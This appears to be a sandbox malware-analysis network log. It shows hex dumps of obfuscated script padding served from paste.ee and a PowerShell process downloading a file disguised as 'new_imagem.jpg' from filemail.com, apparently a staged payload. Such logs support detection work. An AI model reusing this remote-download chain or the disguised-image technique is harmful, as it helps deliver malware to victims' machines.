                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T50x1ygzr73B6huAcp%2Bz39M8oE608WB5WZCIkIEavWponvMutPoyLLoN9%2FJ5flBPyvLnXCALLqJO2NXWpJbtWNVejw0NMqGP7WBTu4fOeBAjIM%2FEVHuRIwClPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dee7b5e985b6b64-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-11-07 15:50:57 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 32 34 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 30 32 39 34 33 32 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 38 66 66 38 64 61 36 62 31 35 62 32 65 34 62 26 74 73 3d 35 30 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=2029432&cwnd=250&unsent_bytes=0&cid=48ff8da6b15b2e4b&ts=505&x=0"
                                                                            2024-11-07 15:50:57 UTC1316INData Raw: 66 37 66 0d 0a 0d 0a 0d 0a 76 61 72 37 36 30 20 3d 20 22 74 65 78 74 6f 37 35 39 22 0d 0a 76 61 72 37 36 31 20 3d 20 22 74 65 78 74 6f 37 36 30 22 0d 0a 76 61 72 37 36 32 20 3d 20 22 74 65 78 74 6f 37 36 31 22 0d 0a 76 61 72 37 36 33 20 3d 20 22 74 65 78 74 6f 37 36 32 22 0d 0a 76 61 72 37 36 34 20 3d 20 22 74 65 78 74 6f 37 36 33 22 0d 0a 76 61 72 37 36 35 20 3d 20 22 74 65 78 74 6f 37 36 34 22 0d 0a 76 61 72 37 36 36 20 3d 20 22 74 65 78 74 6f 37 36 35 22 0d 0a 76 61 72 37 36 37 20 3d 20 22 74 65 78 74 6f 37 36 36 22 0d 0a 76 61 72 37 36 38 20 3d 20 22 74 65 78 74 6f 37 36 37 22 0d 0a 76 61 72 37 36 39 20 3d 20 22 74 65 78 74 6f 37 36 38 22 0d 0a 0d 0a 76 61 72 37 37 30 20 3d 20 22 74 65 78 74 6f 37 36 39 22 0d 0a 76 61 72 37 37 31 20 3d 20 22 74 65 78
                                                                            Data Ascii: f7fvar760 = "texto759"var761 = "texto760"var762 = "texto761"var763 = "texto762"var764 = "texto763"var765 = "texto764"var766 = "texto765"var767 = "texto766"var768 = "texto767"var769 = "texto768"var770 = "texto769"var771 = "tex
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 32 30 22 0d 0a 76 61 72 38 32 32 20 3d 20 22 74 65 78 74 6f 38 32 31 22 0d 0a 76 61 72 38 32 33 20 3d 20 22 74 65 78 74 6f 38 32 32 22 0d 0a 76 61 72 38 32 34 20 3d 20 22 74 65 78 74 6f 38 32 33 22 0d 0a 76 61 72 38 32 35 20 3d 20 22 74 65 78 74 6f 38 32 34 22 0d 0a 76 61 72 38 32 36 20 3d 20 22 74 65 78 74 6f 38 32 35 22 0d 0a 76 61 72 38 32 37 20 3d 20 22 74 65 78 74 6f 38 32 36 22 0d 0a 76 61 72 38 32 38 20 3d 20 22 74 65 78 74 6f 38 32 37 22 0d 0a 76 61 72 38 32 39 20 3d 20 22 74 65 78 74 6f 38 32 38 22 0d 0a 0d 0a 76 61 72 38 33 30 20 3d 20 22 74 65 78 74 6f 38 32 39 22 0d 0a 76 61 72 38 33 31 20 3d 20 22 74 65 78 74 6f 38 33 30 22 0d 0a 76 61 72 38 33 32 20 3d 20 22 74 65 78 74 6f 38 33 31 22 0d 0a 76 61 72 38 33 33 20 3d 20 22 74 65 78 74 6f 38 33
                                                                            Data Ascii: 20"var822 = "texto821"var823 = "texto822"var824 = "texto823"var825 = "texto824"var826 = "texto825"var827 = "texto826"var828 = "texto827"var829 = "texto828"var830 = "texto829"var831 = "texto830"var832 = "texto831"var833 = "texto83
                                                                            2024-11-07 15:50:57 UTC1289INData Raw: 20 22 74 65 78 74 6f 38 38 35 22 0d 0a 76 61 72 38 38 37 20 3d 20 22 74 65 78 74 6f 38 38 36 22 0d 0a 76 61 72 38 38 38 20 3d 20 22 74 65 78 74 6f 38 38 37 22 0d 0a 76 61 72 38 38 39 20 3d 20 22 74 65 78 74 6f 38 38 38 22 0d 0a 0d 0a 76 61 72 38 39 30 20 3d 20 22 74 65 78 74 6f 38 38 39 22 0d 0a 76 61 72 38 39 31 20 3d 20 22 74 65 78 74 6f 38 39 30 22 0d 0a 76 61 72 38 39 32 20 3d 20 22 74 65 78 74 6f 38 39 31 22 0d 0a 76 61 72 38 39 33 20 3d 20 22 74 65 78 74 6f 38 39 32 22 0d 0a 76 61 72 38 39 34 20 3d 20 22 74 65 78 74 6f 38 39 33 22 0d 0a 76 61 72 38 39 35 20 3d 20 22 74 65 78 74 6f 38 39 34 22 0d 0a 76 61 72 38 39 36 20 3d 20 22 74 65 78 74 6f 38 39 35 22 0d 0a 76 61 72 38 39 37 20 3d 20 22 74 65 78 74 6f 38 39 36 22 0d 0a 76 61 72 38 39 38 20 3d 20
                                                                            Data Ascii: "texto885"var887 = "texto886"var888 = "texto887"var889 = "texto888"var890 = "texto889"var891 = "texto890"var892 = "texto891"var893 = "texto892"var894 = "texto893"var895 = "texto894"var896 = "texto895"var897 = "texto896"var898 =
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 37 66 66 35 0d 0a 72 39 34 37 20 3d 20 22 74 65 78 74 6f 39 34 36 22 0d 0a 76 61 72 39 34 38 20 3d 20 22 74 65 78 74 6f 39 34 37 22 0d 0a 76 61 72 39 34 39 20 3d 20 22 74 65 78 74 6f 39 34 38 22 0d 0a 0d 0a 76 61 72 39 35 30 20 3d 20 22 74 65 78 74 6f 39 34 39 22 0d 0a 76 61 72 39 35 31 20 3d 20 22 74 65 78 74 6f 39 35 30 22 0d 0a 76 61 72 39 35 32 20 3d 20 22 74 65 78 74 6f 39 35 31 22 0d 0a 76 61 72 39 35 33 20 3d 20 22 74 65 78 74 6f 39 35 32 22 0d 0a 76 61 72 39 35 34 20 3d 20 22 74 65 78 74 6f 39 35 33 22 0d 0a 76 61 72 39 35 35 20 3d 20 22 74 65 78 74 6f 39 35 34 22 0d 0a 76 61 72 39 35 36 20 3d 20 22 74 65 78 74 6f 39 35 35 22 0d 0a 76 61 72 39 35 37 20 3d 20 22 74 65 78 74 6f 39 35 36 22 0d 0a 76 61 72 39 35 38 20 3d 20 22 74 65 78 74 6f 39 35 37
                                                                            Data Ascii: 7ff5r947 = "texto946"var948 = "texto947"var949 = "texto948"var950 = "texto949"var951 = "texto950"var952 = "texto951"var953 = "texto952"var954 = "texto953"var955 = "texto954"var956 = "texto955"var957 = "texto956"var958 = "texto957
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 20 22 74 65 78 74 6f 31 30 30 39 22 0d 0a 76 61 72 31 30 31 31 20 3d 20 22 74 65 78 74 6f 31 30 31 30 22 0d 0a 76 61 72 31 30 31 32 20 3d 20 22 74 65 78 74 6f 31 30 31 31 22 0d 0a 76 61 72 31 30 31 33 20 3d 20 22 74 65 78 74 6f 31 30 31 32 22 0d 0a 76 61 72 31 30 31 34 20 3d 20 22 74 65 78 74 6f 31 30 31 33 22 0d 0a 76 61 72 31 30 31 35 20 3d 20 22 74 65 78 74 6f 31 30 31 34 22 0d 0a 76 61 72 31 30 31 36 20 3d 20 22 74 65 78 74 6f 31 30 31 35 22 0d 0a 76 61 72 31 30 31 37 20 3d 20 22 74 65 78 74 6f 31 30 31 36 22 0d 0a 76 61 72 31 30 31 38 20 3d 20 22 74 65 78 74 6f 31 30 31 37 22 0d 0a 76 61 72 31 30 31 39 20 3d 20 22 74 65 78 74 6f 31 30 31 38 22 0d 0a 0d 0a 76 61 72 31 30 32 30 20 3d 20 22 74 65 78 74 6f 31 30 31 39 22 0d 0a 76 61 72 31 30 32 31 20 3d
                                                                            Data Ascii: "texto1009"var1011 = "texto1010"var1012 = "texto1011"var1013 = "texto1012"var1014 = "texto1013"var1015 = "texto1014"var1016 = "texto1015"var1017 = "texto1016"var1018 = "texto1017"var1019 = "texto1018"var1020 = "texto1019"var1021 =
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 74 65 78 74 6f 31 30 36 38 22 0d 0a 0d 0a 76 61 72 31 30 37 30 20 3d 20 22 74 65 78 74 6f 31 30 36 39 22 0d 0a 76 61 72 31 30 37 31 20 3d 20 22 74 65 78 74 6f 31 30 37 30 22 0d 0a 76 61 72 31 30 37 32 20 3d 20 22 74 65 78 74 6f 31 30 37 31 22 0d 0a 76 61 72 31 30 37 33 20 3d 20 22 74 65 78 74 6f 31 30 37 32 22 0d 0a 76 61 72 31 30 37 34 20 3d 20 22 74 65 78 74 6f 31 30 37 33 22 0d 0a 76 61 72 31 30 37 35 20 3d 20 22 74 65 78 74 6f 31 30 37 34 22 0d 0a 76 61 72 31 30 37 36 20 3d 20 22 74 65 78 74 6f 31 30 37 35 22 0d 0a 76 61 72 31 30 37 37 20 3d 20 22 74 65 78 74 6f 31 30 37 36 22 0d 0a 76 61 72 31 30 37 38 20 3d 20 22 74 65 78 74 6f 31 30 37 37 22 0d 0a 76 61 72 31 30 37 39 20 3d 20 22 74 65 78 74 6f 31 30 37 38 22 0d 0a 0d 0a 76 61 72 31 30 38 30 20 3d
                                                                            Data Ascii: texto1068"var1070 = "texto1069"var1071 = "texto1070"var1072 = "texto1071"var1073 = "texto1072"var1074 = "texto1073"var1075 = "texto1074"var1076 = "texto1075"var1077 = "texto1076"var1078 = "texto1077"var1079 = "texto1078"var1080 =
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 74 65 78 74 6f 31 31 32 37 22 0d 0a 76 61 72 31 31 32 39 20 3d 20 22 74 65 78 74 6f 31 31 32 38 22 0d 0a 0d 0a 76 61 72 31 31 33 30 20 3d 20 22 74 65 78 74 6f 31 31 32 39 22 0d 0a 76 61 72 31 31 33 31 20 3d 20 22 74 65 78 74 6f 31 31 33 30 22 0d 0a 76 61 72 31 31 33 32 20 3d 20 22 74 65 78 74 6f 31 31 33 31 22 0d 0a 76 61 72 31 31 33 33 20 3d 20 22 74 65 78 74 6f 31 31 33 32 22 0d 0a 76 61 72 31 31 33 34 20 3d 20 22 74 65 78 74 6f 31 31 33 33 22 0d 0a 76 61 72 31 31 33 35 20 3d 20 22 74 65 78 74 6f 31 31 33 34 22 0d 0a 76 61 72 31 31 33 36 20 3d 20 22 74 65 78 74 6f 31 31 33 35 22 0d 0a 76 61 72 31 31 33 37 20 3d 20 22 74 65 78 74 6f 31 31 33 36 22 0d 0a 76 61 72 31 31 33 38 20 3d 20 22 74 65 78 74 6f 31 31 33 37 22 0d 0a 76 61 72 31 31 33 39 20 3d 20 22
                                                                            Data Ascii: texto1127"var1129 = "texto1128"var1130 = "texto1129"var1131 = "texto1130"var1132 = "texto1131"var1133 = "texto1132"var1134 = "texto1133"var1135 = "texto1134"var1136 = "texto1135"var1137 = "texto1136"var1138 = "texto1137"var1139 = "
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 74 65 78 74 6f 31 31 38 36 22 0d 0a 76 61 72 31 31 38 38 20 3d 20 22 74 65 78 74 6f 31 31 38 37 22 0d 0a 76 61 72 31 31 38 39 20 3d 20 22 74 65 78 74 6f 31 31 38 38 22 0d 0a 0d 0a 76 61 72 31 31 39 30 20 3d 20 22 74 65 78 74 6f 31 31 38 39 22 0d 0a 76 61 72 31 31 39 31 20 3d 20 22 74 65 78 74 6f 31 31 39 30 22 0d 0a 76 61 72 31 31 39 32 20 3d 20 22 74 65 78 74 6f 31 31 39 31 22 0d 0a 76 61 72 31 31 39 33 20 3d 20 22 74 65 78 74 6f 31 31 39 32 22 0d 0a 76 61 72 31 31 39 34 20 3d 20 22 74 65 78 74 6f 31 31 39 33 22 0d 0a 76 61 72 31 31 39 35 20 3d 20 22 74 65 78 74 6f 31 31 39 34 22 0d 0a 76 61 72 31 31 39 36 20 3d 20 22 74 65 78 74 6f 31 31 39 35 22 0d 0a 76 61 72 31 31 39 37 20 3d 20 22 74 65 78 74 6f 31 31 39 36 22 0d 0a 76 61 72 31 31 39 38 20 3d 20 22
                                                                            Data Ascii: texto1186"var1188 = "texto1187"var1189 = "texto1188"var1190 = "texto1189"var1191 = "texto1190"var1192 = "texto1191"var1193 = "texto1192"var1194 = "texto1193"var1195 = "texto1194"var1196 = "texto1195"var1197 = "texto1196"var1198 = "
                                                                            2024-11-07 15:50:57 UTC1369INData Raw: 74 65 78 74 6f 31 32 34 35 22 0d 0a 76 61 72 31 32 34 37 20 3d 20 22 74 65 78 74 6f 31 32 34 36 22 0d 0a 76 61 72 31 32 34 38 20 3d 20 22 74 65 78 74 6f 31 32 34 37 22 0d 0a 76 61 72 31 32 34 39 20 3d 20 22 74 65 78 74 6f 31 32 34 38 22 0d 0a 0d 0a 76 61 72 31 32 35 30 20 3d 20 22 74 65 78 74 6f 31 32 34 39 22 0d 0a 76 61 72 31 32 35 31 20 3d 20 22 74 65 78 74 6f 31 32 35 30 22 0d 0a 76 61 72 31 32 35 32 20 3d 20 22 74 65 78 74 6f 31 32 35 31 22 0d 0a 76 61 72 31 32 35 33 20 3d 20 22 74 65 78 74 6f 31 32 35 32 22 0d 0a 76 61 72 31 32 35 34 20 3d 20 22 74 65 78 74 6f 31 32 35 33 22 0d 0a 76 61 72 31 32 35 35 20 3d 20 22 74 65 78 74 6f 31 32 35 34 22 0d 0a 76 61 72 31 32 35 36 20 3d 20 22 74 65 78 74 6f 31 32 35 35 22 0d 0a 76 61 72 31 32 35 37 20 3d 20 22
                                                                            Data Ascii: texto1245"var1247 = "texto1246"var1248 = "texto1247"var1249 = "texto1248"var1250 = "texto1249"var1251 = "texto1250"var1252 = "texto1251"var1253 = "texto1252"var1254 = "texto1253"var1255 = "texto1254"var1256 = "texto1255"var1257 = "


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249166142.215.209.784434004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-07 15:51:01 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                            Host: 1017.filemail.com
                                                                            Connection: Keep-Alive
                                                                            2024-11-07 15:51:01 UTC324INHTTP/1.1 200 OK
                                                                            Content-Length: 2230233
                                                                            Content-Type: image/jpeg
                                                                            Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                            Accept-Ranges: bytes
                                                                            ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                            X-Transfer-ID: wxhdiueivoluihj
                                                                            Content-Disposition: attachment; filename=new_imagem.jpg
                                                                            Date: Thu, 07 Nov 2024 15:51:01 GMT
                                                                            Connection: close
                                                                            2024-11-07 15:51:01 UTC3569INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23 6e 08 78 21 78 39 89 e2 de 13 2c 7a 22 ba 15 da df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4
                                                                            Data Ascii: .NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3 e9 3c ed e8 97 f8 43 74 3f 1b c6 f4 cf 3f 85 ce ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9
                                                                            Data Ascii: 4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD<Ct??wH?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 28 55 d8 c2 c0 ea 14 b1 03 8e f9 95 e7 eb 28 12 80 83 c1 ae d8 70 a5 9c 12 e7 cb ff 00 08 c0 76 69 94 b2 81 1d 8e a5 b1 76 94 3d d2 01 d8 0c 93 22 35 20 24 57 63 8b a8 74 9a 47 93 98 c7 e1 38 0d 25 b1 16 28 f7 c7 02 a1 1e ae 49 e0 2e 79 dd 68 9d 26 67 8e 52 a9 b4 1c 3c de 2d 24 11 42 9b 55 d8 ad 93 7d fb 60 68 6a 35 09 a2 8c bc b4 49 e1 57 b9 39 95 1e 9f 53 e3 52 36 a6 56 d9 12 fb 0e 00 1e d8 dc 05 fc d8 35 da a7 a6 b0 54 15 04 06 06 ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73
                                                                            Data Ascii: (U(pviv="5 $WctG8%(I.yh&gR<-$BU}`hj5IW9SR6V5T=./ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 15 20 8b ee 6f ae 2b e2 b0 3b 6b 21 64 d3 b3 45 b4 6e 74 bb dd f1 a6 18 16 9f 4b 33 b4 52 69 27 7f 22 a9 95 a5 7f 51 bf 7b c5 3c 4f ca 4d 14 e8 7c e4 95 82 b0 0f 33 10 cd ba 8f 04 d7 f0 f5 cd 5f 0f 69 61 f0 ff 00 2b 50 18 36 e6 da 5b 92 07 6e b9 9d f6 8d 75 0b e1 f1 ca a4 b4 4a 69 c0 21 54 73 c1 fc e8 60 64 c5 e1 32 be 82 1d 5c 6b b8 04 6d e1 9f f0 80 cd ce 2d f7 57 d4 48 91 88 c9 91 c6 e5 e8 01 1e f6 73 6f c1 e4 96 7f 02 68 c3 ed 72 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69
                                                                            Data Ascii: o+;k!dEntK3Ri'"Q{<OM|3_ia+P6[nuJi!Ts`d2\km-WHsohrpEaU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1i
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 3a ba 40 84 31 03 9e b9 ab a6 d5 2c fa 5d be a6 2a 28 ae ee 46 64 6a 21 8f 4f a8 29 cb 01 84 d1 cc 90 ce a4 06 25 b8 23 00 72 b2 ac f3 06 52 7d 6d 5c d5 73 97 f0 f3 ff 00 6d 53 40 70 7b 5f 6c 0c a5 7c e9 2c 30 25 8d 0f ae 31 a4 45 8a 6f 32 46 20 2a 96 55 1f 88 f1 fa 60 6d 3a 17 00 2f 41 ea 38 16 d4 47 0a 80 5c 71 d4 f6 18 b9 d4 cd 14 9e a6 0a 82 c8 41 c9 db c7 7f ae 67 6a 48 9b 53 23 05 2a 59 81 00 fb 56 03 f3 78 9c 61 a9 2d 87 73 db 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48
                                                                            Data Ascii: :@1,]*(Fdj!O)%#rR}m\smS@p{_l|,0%1Eo2F *U`m:/A8G\qAgjHS#*YVxa-shCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGH
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: a1 81 db 74 4e 6f 2e 8d 8e 99 a3 d3 c6 ad c5 ae f1 75 99 32 47 18 32 08 9d 36 a9 ea cd ea 3f 2a 19 6d 18 9e 52 51 35 2b 15 ff 00 89 c8 fe 58 16 94 43 01 11 ea 21 61 20 ea c3 8f cb 34 3c 3f 53 08 57 65 0a 84 8d a0 9a b0 3d f1 29 74 fa a6 91 d2 49 14 b7 53 64 92 05 8e 86 be 18 3f 28 a9 a3 a8 42 58 74 0d 55 7e fc 60 7a 58 0e 9a 58 1b cb 95 8c 7b 68 f1 61 b1 8d 24 10 e9 dc c7 09 6a 72 28 d7 04 f7 cc 9d 0f 86 78 8c 24 34 1a 98 51 59 2b 6e e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f
                                                                            Data Ascii: tNo.u2G26?*mRQ5+XC!a 4<?SWe=)tISd?(BXtU~`zXX{ha$jr(x$4QY+n IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 94 31 24 29 f4 81 7e d5 dc 37 6c 14 1e 22 66 98 20 89 96 49 90 34 42 47 60 18 0b ed fc 3c 73 80 83 f8 03 fa d1 93 78 12 29 f3 ac 2d a9 07 77 a6 fb 1a ce 6f 0c 78 f4 27 4b 1e 95 65 95 9b d1 3d a9 dc 2e c1 bb e3 81 54 71 f8 b5 93 6a bc ca 48 c6 c7 64 a6 73 4c 41 16 2f 6f b5 e0 4f 89 3b e9 b4 ba d3 14 6a ad 2e d5 56 93 dc 30 36 6b 8c 00 6a bc 3a 0d 66 bf 54 b1 c3 1a 88 e0 64 50 b4 b5 2f 6b fc f2 d1 78 73 c7 aa d1 15 8d 96 32 14 4e aa e1 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88
                                                                            Data Ascii: 1$)~7l"f I4BG`<sx)-wox'Ke=.TqjHdsLA/oO;j.V06kj:fTdP/kxs2NAe[RTU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb
                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 62 6a a4 2e de c7 34 b4 b0 b3 c2 ac 87 a0 aa fa e0 0e 6f 0f 77 98 16 99 99 4f 00 fb 65 8f 86 24 6a 5c cc 7d 23 1c 86 27 79 57 73 7a 42 f2 3e 37 83 d4 c2 ff 00 76 52 5a 94 df 3e fc e0 66 69 b4 fe 7c a5 37 91 de fd f1 d1 a0 2b 4b e7 b0 c1 c4 be 59 2c 3f 16 34 65 f5 07 07 8d be af 9e 02 33 c0 52 b7 cd bf b0 c2 ae 8c 90 b5 3d 12 3a 65 5d 37 31 62 3a e7 22 15 60 c3 a8 c0 24 50 f9 6c 76 ea 39 ef 91 2c 0d b7 d5 31 6f 96 13 ca 42 8c 41 7b be 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d
                                                                            Data Ascii: bj.4owOe$j\}#'yWszB>7vRZ>fi|7+KY,?4e3R=:e]71b:"`$Plv9,1oBA{@z(4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=
